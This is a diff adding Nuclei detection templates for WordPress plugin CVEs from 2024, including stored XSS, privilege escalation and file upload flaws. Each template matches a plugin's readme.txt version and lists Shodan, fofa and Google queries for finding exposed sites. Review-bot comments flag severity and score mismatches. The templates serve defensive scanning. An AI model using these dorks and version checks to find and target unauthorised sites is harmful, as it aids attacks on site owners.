+++ b/poc/cve/CVE-2024-37962-d175fbe85434a0614bc0ae08147f4de6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-37962-d175fbe85434a0614bc0ae08147f4de6
+
+info:
+ name: >
+ Fusion <= 1.6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Fusion plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/94ae2c4e-7281-4993-967b-6321e6279c47?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-37962
+ metadata:
+ fofa-query: "wp-content/plugins/fusion/"
+ google-query: inurl:"/wp-content/plugins/fusion/"
+ shodan-query: 'vuln:CVE-2024-37962'
+ tags: cve,wordpress,wp-plugin,fusion,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fusion/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fusion"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43336-9ded2f75d9ce3d5a447116c77b245d3a.yaml b/poc/cve/CVE-2024-43336-9ded2f75d9ce3d5a447116c77b245d3a.yaml
new file mode 100644
index 0000000000..28edd42cc2
--- /dev/null
+++ b/poc/cve/CVE-2024-43336-9ded2f75d9ce3d5a447116c77b245d3a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43336-9ded2f75d9ce3d5a447116c77b245d3a
+
+info:
+ name: >
+ WP User Manager <= 2.9.10 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The WP User Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.9.10. This is due to missing or incorrect nonce validation on the fix_data_installation() function. This makes it possible for unauthenticated attackers to fix data installation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/217b1213-de46-4c1d-baea-41a859bfcc60?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43336
+ metadata:
+ fofa-query: "wp-content/plugins/wp-user-manager/"
+ google-query: inurl:"/wp-content/plugins/wp-user-manager/"
+ shodan-query: 'vuln:CVE-2024-43336'
+ tags: cve,wordpress,wp-plugin,wp-user-manager,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-user-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-user-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.9.10')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f.yaml b/poc/cve/CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f.yaml
new file mode 100644
index 0000000000..d441e4e011
--- /dev/null
+++ b/poc/cve/CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f
+
+info:
+ name: >
+ Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor <= 2.0.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via data-jltma-wrapper-link Element
+ author: topscoder
+ severity: low
+ description: >
+ The Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-jltma-wrapper-link element in all versions up to, and including 2.0.6.4 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks on the injected link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8bab0acc-5a5d-4dd4-9201-199b7f5aaa69?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-6282
+ metadata:
+ fofa-query: "wp-content/plugins/master-addons/"
+ google-query: inurl:"/wp-content/plugins/master-addons/"
+ shodan-query: 'vuln:CVE-2024-6282'
+ tags: cve,wordpress,wp-plugin,master-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/master-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "master-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7493-827cf828502e280939934bc36fcd15c8.yaml b/poc/cve/CVE-2024-7493-827cf828502e280939934bc36fcd15c8.yaml
new file mode 100644
index 0000000000..d4dc172250
--- /dev/null
+++ b/poc/cve/CVE-2024-7493-827cf828502e280939934bc36fcd15c8.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7493-827cf828502e280939934bc36fcd15c8
+
+info:
+ name: >
+ WPCOM Member <= 1.5.2.1 - Unauthenticated Privilege Escalation via User Meta
+ author: topscoder
+ severity: critical
+ description: >
+ The WPCOM Member plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.5.2.1. This is due to the plugin allowing arbitrary data to be passed to wp_insert_user() during registration. This makes it possible for unauthenticated attackers to update their role to that of an administrator during registration.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec7f3e0c-a07c-4082-9b6b-12d0fbe0fdc8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-7493
+ metadata:
+ fofa-query: "wp-content/plugins/wpcom-member/"
+ google-query: inurl:"/wp-content/plugins/wpcom-member/"
+ shodan-query: 'vuln:CVE-2024-7493'
+ tags: cve,wordpress,wp-plugin,wpcom-member,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpcom-member/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpcom-member"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml b/poc/cve/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml
new file mode 100644
index 0000000000..c030b8c755
--- /dev/null
+++ b/poc/cve/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via content Parameter + author: topscoder + severity: low + description: > + The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘content’ parameter in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7618 + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:CVE-2024-7618' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file 
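Review bot: `severity: low` and the trailing `low` tag contradict the template's own `cvss-score: 4.4` (CVSS v3.1 rates 4.0–6.9 as Medium), so anyone filtering on severity will drop a finding the score says is medium; either the score or the severity has to change, e.g. `severity: medium` and `tags: cve,wordpress,wp-plugin,peepso-core,medium`. The same score/severity mismatch appears in the other new templates in this commit: CVE-2024-7655 (4.4 / low), CVE-2024-7770 and CVE-2024-8268 (8.8 / low), CVE-2024-8241 and CVE-2024-8543 (6.4 / low), and CVE-2024-8369 (5.3 / high). The severity appears to be copied from the upstream feed rather than derived from the score, so checking it once in the generator is probably cheaper than fixing each file.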
diff --git a/poc/cve/CVE-2024-7655-cb8797e18cf270e181c88790358f477b.yaml b/poc/cve/CVE-2024-7655-cb8797e18cf270e181c88790358f477b.yaml new file mode 100644 index 0000000000..db12dd5f7c --- /dev/null +++ b/poc/cve/CVE-2024-7655-cb8797e18cf270e181c88790358f477b.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7655-cb8797e18cf270e181c88790358f477b + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e85ee611-ae81-4736-b4f0-b9d06714da18?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7655 + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:CVE-2024-7655' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml b/poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml new file mode 100644 index 0000000000..99dbff5181 --- /dev/null +++ b/poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5 + +info: + name: > + Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress <= 6.5.5 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload' function in all versions up to, and including, 6.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted upload permissions by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cae7702-e531-45b9-9131-42edbc073a07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7770 + metadata: + fofa-query: "wp-content/plugins/file-manager/" + google-query: inurl:"/wp-content/plugins/file-manager/" + shodan-query: 'vuln:CVE-2024-7770' + tags: cve,wordpress,wp-plugin,file-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/file-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "file-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.5.5') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml b/poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml new file mode 100644 index 0000000000..70a64adb5b --- /dev/null +++ b/poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487 + +info: + name: > + Nova Blocks by Pixelgrade <= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + The Nova Blocks by Pixelgrade plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' attribute of the 'wp:separator' Gutenberg block in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3011befd-c0c6-4800-a370-e592c3ec483f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8241 + metadata: + fofa-query: "wp-content/plugins/nova-blocks/" + google-query: inurl:"/wp-content/plugins/nova-blocks/" + shodan-query: 'vuln:CVE-2024-8241' + tags: cve,wordpress,wp-plugin,nova-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nova-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nova-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.7') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml b/poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml new file mode 100644 index 0000000000..04a2ca8f4e --- /dev/null +++ b/poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95 + +info: + name: > + Frontend Dashboard <= 2.2.4 - Authenticated (Subscriber+) Arbitrary Function Call + author: topscoder + severity: low + description: > + The Frontend Dashboard plugin for WordPress is vulnerable to unauthorized code execution due to insufficient filtering on callable methods/functions via the ajax_request() function in all versions up to, and including, 2.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to call arbitrary functions that can be leverage for privilege escalation by changing user's passwords. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d66694a-c99f-44f8-8004-1a47ad9f9250?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-8268 + metadata: + fofa-query: "wp-content/plugins/frontend-dashboard/" + google-query: inurl:"/wp-content/plugins/frontend-dashboard/" + shodan-query: 'vuln:CVE-2024-8268' + tags: cve,wordpress,wp-plugin,frontend-dashboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/frontend-dashboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "frontend-dashboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml b/poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml new file mode 100644 index 0000000000..60b20be14f --- /dev/null 
+++ b/poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8369-371892027f1c271d3247dba36b384fb8 + +info: + name: > + EventPrime <= 4.0.4.3 - Missing Authorization to Unauthenticated Private or Password-Protected Events Disclosure + author: topscoder + severity: high + description: > + The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access to Private or Password-protected events due to missing authorization checks in all versions up to, and including, 4.0.4.3. This makes it possible for unauthenticated attackers to view private or password-protected events. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8369 + metadata: + fofa-query: "wp-content/plugins/eventprime-event-calendar-management/" + google-query: inurl:"/wp-content/plugins/eventprime-event-calendar-management/" + shodan-query: 'vuln:CVE-2024-8369' + tags: cve,wordpress,wp-plugin,eventprime-event-calendar-management,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eventprime-event-calendar-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eventprime-event-calendar-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4.3') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml b/poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml new file mode 100644 index 0000000000..5a81f81be5 --- /dev/null +++ b/poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf + +info: + name: > + Affiliate Super Assistent <= 1.5.3 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: high + description: > + The The Affiliate Super Assistent plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.5.3. This is due to the software allowing users to supply arbitrary shortcodes in comments when the 'Parse comments' option is enabled. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f50769c-77b8-42ff-b67d-b9b289fc51da?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-8478 + metadata: + fofa-query: "wp-content/plugins/amazonsimpleadmin/" + google-query: inurl:"/wp-content/plugins/amazonsimpleadmin/" + shodan-query: 'vuln:CVE-2024-8478' + tags: cve,wordpress,wp-plugin,amazonsimpleadmin,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/amazonsimpleadmin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "amazonsimpleadmin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.3') \ No newline at end of file 
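Review bot: The `description` opens with "The The Affiliate Super Assistent plugin for WordPress", a doubled article that reads as a generator artifact (the `name:` field has "Affiliate Super Assistent" without the article); it should read `The Affiliate Super Assistent plugin for WordPress is vulnerable to arbitrary shortcode execution …`. The duplication is likely inherited from the upstream record, so it may be worth stripping a leading "The " in the generator before prefixing its own.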
diff --git a/poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml b/poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml new file mode 100644 index 0000000000..c639b730bb --- /dev/null +++ b/poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10 + +info: + name: > + Slider comparison image before and after <= 0.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Slider comparison image before and after plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [sciba] shortcode in all versions up to, and including, 0.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8543 + metadata: + fofa-query: "wp-content/plugins/slider-comparison-image-before-and-after/" + google-query: inurl:"/wp-content/plugins/slider-comparison-image-before-and-after/" + shodan-query: 'vuln:CVE-2024-8543' + tags: cve,wordpress,wp-plugin,slider-comparison-image-before-and-after,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/slider-comparison-image-before-and-after/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "slider-comparison-image-before-and-after" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.3') \ No newline at end of file 
diff --git a/poc/cve/cve-2016-1000154.yaml b/poc/cve/cve-2016-1000154.yaml index 6080409f32..dfbff06092 100644 --- a/poc/cve/cve-2016-1000154.yaml +++ b/poc/cve/cve-2016-1000154.yaml @@ -5,17 +5,13 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin whizz v1.0. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 - - https://wordpress.org/plugins/whizz - - http://www.securityfocus.com/bid/93538 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 + tags: cve,cve2016,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-1000154 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/cve/cve-2019-2579.yaml b/poc/cve/cve-2019-2579.yaml index f54804eb17..b8cc27c5e2 100644 --- a/poc/cve/cve-2019-2579.yaml +++ b/poc/cve/cve-2019-2579.yaml 
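Review bot: The new `reference:` collapses the four-entry list to the single NVD link, dropping the vapidlabs advisory, the plugin page and the securityfocus entry, which are exactly the sources a responder needs to confirm the finding; keep the list form, `reference:` followed by the four `- ` URL entries. `cvss-score: 6.10` also rewrites a numeric 6.1 in a trailing-zero form that no new template in this commit uses (they use 9.8, 8.8, 6.4), which together with the moved `tags:` line looks like a revert to an older generation of the template rather than a deliberate edit. The same pattern — references pruned to one entry and the score rewritten with a trailing zero — appears in the cve-2019-2579 hunks (where the Oracle CPU advisory link is lost) and the cve-2021-24335 hunk (where the wpscan and m0ze advisories are lost).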
@@ -1,20 +1,19 @@ id: CVE-2019-2579 info: - name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection + name: Oracle WebCenter Sites - SQL Injection author: leovalcante severity: medium - description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. + description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. reference: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://github.com/Leovalcante/wcs_scanner - - https://nvd.nist.gov/vuln/detail/CVE-2019-2579 - - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html + tags: cve,cve2019,oracle,wcs,sqli classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 + cvss-score: 4.30 cve-id: CVE-2019-2579 - tags: cve,cve2019,oracle,wcs,sqli + requests: - raw: @@ -49,6 +48,4 @@ requests: - type: status status: - - 200 - -# Enhanced by mp on 2022/05/04 + - 200 \ No newline at end of file diff --git a/poc/cve/cve-2020-15227.yaml b/poc/cve/cve-2020-15227.yaml index e483393043..2adba03624 100644 --- a/poc/cve/cve-2020-15227.yaml +++ b/poc/cve/cve-2020-15227.yaml 
